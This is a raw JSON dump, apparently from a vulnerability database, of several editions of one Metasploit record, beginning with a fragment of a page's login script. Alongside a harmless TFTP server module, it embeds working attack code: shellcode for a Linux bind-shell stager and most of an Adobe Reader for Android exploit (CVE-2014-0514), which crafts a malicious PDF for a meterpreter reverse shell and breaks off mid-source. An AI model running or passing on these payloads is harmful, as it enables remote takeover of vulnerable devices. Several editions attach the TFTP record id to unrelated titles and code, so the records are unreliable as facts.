userNamePlaceHolderText;placeholder.style.zIndex = 100;if (window.attachEvent) {input_field.attachEvent('onkeyup', function(e) {if (!e.srcElement.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}else {input_field.addEventListener('keyup', function(e) {if (!e.target.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}setTimeout(function() {var companyLogoImgEl = document.getElementById(\"cmpy_info\");if (companyLogoImgEl) {var theImage = new Image();if(window.attachEvent) {theImage.src = companyLogoImgEl.src;companyLogoImgEl.attachEvent('onmouseover', function(e) {companyLogoImgEl.style.msTransform = 
\"scale(2)\";});companyLogoImgEl.attachEvent('onmouseout', function(e) {companyLogoImgEl.style.msTransform = \"scale(1)\";});}else if(window.addEventListener){theImage.src = companyLogoImgEl.src;companyLogoImgEl.addEventListener('mouseover', function(e) {companyLogoImgEl.style.transform = \"scale(2)\";});companyLogoImgEl.addEventListener('mouseout', function(e) {companyLogoImgEl.style.transform = \"scale(1)\";});}}}, 200);</script></body></html>", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-07T18:02:59", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-07T23:53:35", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.5, "vector": "NONE", "modified": "2019-07-07T23:53:35"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1847-1:2B931", "DEBIAN:DLA-1844-1:DE689"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32954", "1337DAY-ID-32955"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994902"]}, {"type": "cve", "idList": ["CVE-2019-10639", "CVE-2018-14733", "CVE-2019-1890", "CVE-2019-1886", "CVE-2018-20850"]}, {"type": "threatpost", "idList": ["THREATPOST:877715F6B7B3157A0BB04907D85EE1F6"]}, {"type": "kitploit", "idList": ["KITPLOIT:6269408450657572101", "KITPLOIT:2549439882250233553"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891844"]}, {"type": "exploitdb", "idList": ["EDB-ID:47076"]}, {"type": "securelist", "idList": ["SECURELIST:9A6AC9776541651616898893ADB1716A"]}, {"type": "thn", "idList": ["THN:4D88AC2FA8EC904F3CE016D6C763499C"]}, 
{"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}], "modified": "2019-07-07T23:53:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 
3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-07T23:53:35", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "79907abbd98e8598af47f817eec26a1d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Command Shell, Bind TCP Stager", "description": "Spawn a command shell (staged). Listen for a connection\n", "published": "2012-09-13T20:15:38", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T00:38:05", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 1.5, "vector": "NONE", "modified": "2019-08-25T00:38:05"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4508-1:2E656", "DEBIAN:DLA-1893-1:51DA6", "DEBIAN:DSA-4505-1:2F1F2"]}, {"type": "kitploit", "idList": ["KITPLOIT:4836041497147545184", "KITPLOIT:8965770478109825786", "KITPLOIT:3272262582020242324"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "schneier", "idList": ["SCHNEIER:A5722B37F55A9C1FB6B8985465D9EAAB"]}, {"type": "cve", "idList": ["CVE-2019-10751"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8D07A3EB1218AA9C61CE095C89CEDE2C", "TRENDMICROBLOG:368E377D2C106DF8154135DC53D0A622"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69858"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154196", "PACKETSTORM:154197"]}, {"type": "exploitdb", "idList": ["EDB-ID:47301"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:D928490F94D371430E538BE5B28D833C"]}], "modified": "2019-08-25T00:38:05"}}, "objectVersion": 
"1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\n###\n#\n# BindTcp\n# -------\n#\n# Linux bind TCP stager.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 63\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux\n\n def self.handler_type_alias\n \"bind_nonx_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager',\n 'Description' => 'Listen for a connection',\n 'Author' => 'skape',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Stager' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 0x14, 'n' ],\n },\n 'Payload' =>\n \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\" +\n \"\\x43\\x52\\x66\\x68\\xbf\\xbf\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\" +\n \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\" +\n \"\\xb0\\x66\\xcd\\x80\\x93\\xb6\\x0c\\xb0\\x03\\xcd\\x80\\x89\\xdf\\xff\\xe1\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T00:38:05", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T03:02:11", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 
1.2, "vector": "NONE", "modified": "2019-08-25T03:02:11"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4508-1:2E656", "DEBIAN:DLA-1893-1:51DA6", "DEBIAN:DSA-4505-1:2F1F2"]}, {"type": "kitploit", "idList": ["KITPLOIT:4836041497147545184", "KITPLOIT:8965770478109825786", "KITPLOIT:3272262582020242324"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "schneier", "idList": ["SCHNEIER:A5722B37F55A9C1FB6B8985465D9EAAB"]}, {"type": "cve", "idList": ["CVE-2019-10751"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8D07A3EB1218AA9C61CE095C89CEDE2C", "TRENDMICROBLOG:368E377D2C106DF8154135DC53D0A622"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69858"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154196", "PACKETSTORM:154197"]}, {"type": "exploitdb", "idList": ["EDB-ID:47301"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:D928490F94D371430E538BE5B28D833C"]}], "modified": "2019-08-25T03:02:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to 
listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T03:02:11", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0b947ee7951ab35799a0e49641135d17", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T14:15:39", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2019-08-28T14:15:39"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:E068C231265847BA99669A8EBF0D395D", 
"THREATPOST:855D1B9BE270C52F4F145172AE284D7C", "THREATPOST:C5BD5C9A6AF65457AB5AD88F2C0001DF", "THREATPOST:A4EB2C80D13E41D28E94FD4374EC976E"]}, {"type": "thn", "idList": ["THN:EA39A4315695FDB9B8D8CF4AE5CA1D8C", "THN:3C361B822E60D3E3F416FF52640D5522"]}, {"type": "exploitdb", "idList": ["EDB-ID:47310", "EDB-ID:47308"]}, {"type": "securelist", "idList": ["SECURELIST:5CDFA4B2F373B8F9BC67975A866F2CEA"]}, {"type": "cve", "idList": ["CVE-2019-13237", "CVE-2019-15642", "CVE-2019-15557", "CVE-2019-15637", "CVE-2019-14300"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2017-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704509", "OPENVAS:1361412562310704508"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154232"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:D6C70"]}], "modified": "2019-08-28T14:15:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The 
directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T14:15:39", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T16:43:20", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2019-08-28T16:43:20"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:855D1B9BE270C52F4F145172AE284D7C", "THREATPOST:C5BD5C9A6AF65457AB5AD88F2C0001DF", "THREATPOST:A4EB2C80D13E41D28E94FD4374EC976E"]}, {"type": "thn", "idList": ["THN:EA39A4315695FDB9B8D8CF4AE5CA1D8C", "THN:3C361B822E60D3E3F416FF52640D5522"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:377EC1EB087DFE3FD1C7FE5926F2A13D", "TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "exploitdb", "idList": ["EDB-ID:47310", "EDB-ID:47308"]}, {"type": "securelist", "idList": ["SECURELIST:5CDFA4B2F373B8F9BC67975A866F2CEA"]}, {"type": "cve", "idList": ["CVE-2019-13237", "CVE-2019-15642", "CVE-2019-15557", "CVE-2019-15637"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2017-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704509", "OPENVAS:1361412562310704508"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154232"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:D6C70"]}], "modified": "2019-08-28T16:43:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP 
server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T16:43:20", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "a0e9da8ae6880586f0b1e1ba11765c7d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Adobe Reader for Android addJavascriptInterface Exploit", "description": "Adobe Reader versions less than 11.2.0 exposes insecure native interfaces to untrusted javascript in a PDF. 
This module embeds the browser exploit from android/webview_addjavascriptinterface into a PDF to get a command shell on vulnerable versions of Reader.\n", "published": "2014-05-31T20:48:24", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0514"], "cvelist": ["CVE-2014-0514"], "lastseen": "2019-09-11T04:46:54", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2019-09-11T04:46:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0514"]}, {"type": "zdt", "idList": ["1337DAY-ID-22148", "1337DAY-ID-22336"]}, {"type": "thn", "idList": ["THN:A9CB8F0B48A3C138A85C57873DF6DB74"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13727"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127113"]}, {"type": "exploitdb", "idList": ["EDB-ID:33791", "EDB-ID:32884"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/ANDROID/FILEFORMAT/ADOBE_READER_PDF_JS_INTERFACE"]}], "modified": "2019-09-11T04:46:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/fileformat'\nrequire 'msf/core/exploit/pdf'\nrequire 'msf/core/exploit/android'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Android\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Reader for Android addJavascriptInterface Exploit',\n 'Description' => %q{\n Adobe Reader versions less than 11.2.0 exposes insecure native\n interfaces to untrusted javascript in 
a PDF. This module embeds the browser\n exploit from android/webview_addjavascriptinterface into a PDF to get a\n command shell on vulnerable versions of Reader.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Yorick Koster', # discoverer\n 'joev' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0514' ],\n [ 'EDB', '32884' ],\n [ 'OSVDB', '105781' ],\n ],\n 'Platform' => 'android',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'android/meterpreter/reverse_tcp'\n },\n 'Targets' => [\n [ 'Android ARM', {\n 'Platform' => 'android',\n 'Arch' => ARCH_ARMLE\n }\n ],\n [ 'Android MIPSLE', {\n 'Platform' => 'android',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'Android X86', {\n 'Platform' => 'android',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DisclosureDate' => 'Apr 13 2014',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n print_status(\"Generating Javascript exploit...\")\n js = add_javascript_interface_exploit_js(ARCH_ARMLE)\n print_status(\"Creating PDF...\")\n file_create(pdf(js))\n end\n\n def trailer(root_obj)\n id = @xref.keys.max+1\n \"trailer\" << eol << \"<</Size %d/Root \" % id << io_ref(root_obj) << \">>\" << eol\n end\n\n def add_compressed(n, data)\n add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))\n end\n\n def pdf(js)\n self.eol = \"\\x0d\"\n @xref = {}\n @pdf = header('1.6')\n\n add_compressed(25, \"eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9\")\n add_compressed(40, \"eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw\")\n add_compressed(3, \"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\")\n add_compressed(32, \"eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo\")\n add_compressed(7, 
\"eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a\")\n add_compressed(16, \"eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==\")\n add_compressed(22, \"eJzjtbHRD1Mw1DMytbPjBQARcgJ6\")\n add_compressed(10, \"eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=\")\n add_compressed(11, \"eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR\")\n add_compressed(12, \"eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD\")\n add_compressed(13, \"eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=\")\n add_compressed(14, \"eJzjjTY0VTBQCFKAULG8ABzfA0M=\")\n add_compressed(15, \"eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==\")\n add_compressed(26, \"eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==\")\n add_compressed(41, \"eJzjjTa2UDBQCIrlBQAKzAIA\")\n add_compressed(54, \"eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=\")\n add_compressed(34, \"eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK\")\n add_compressed(35, \"eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==\")\n add_compressed(33, \"eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==\")\n add_compressed(29, \"eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=\")\n add_compressed(36, 
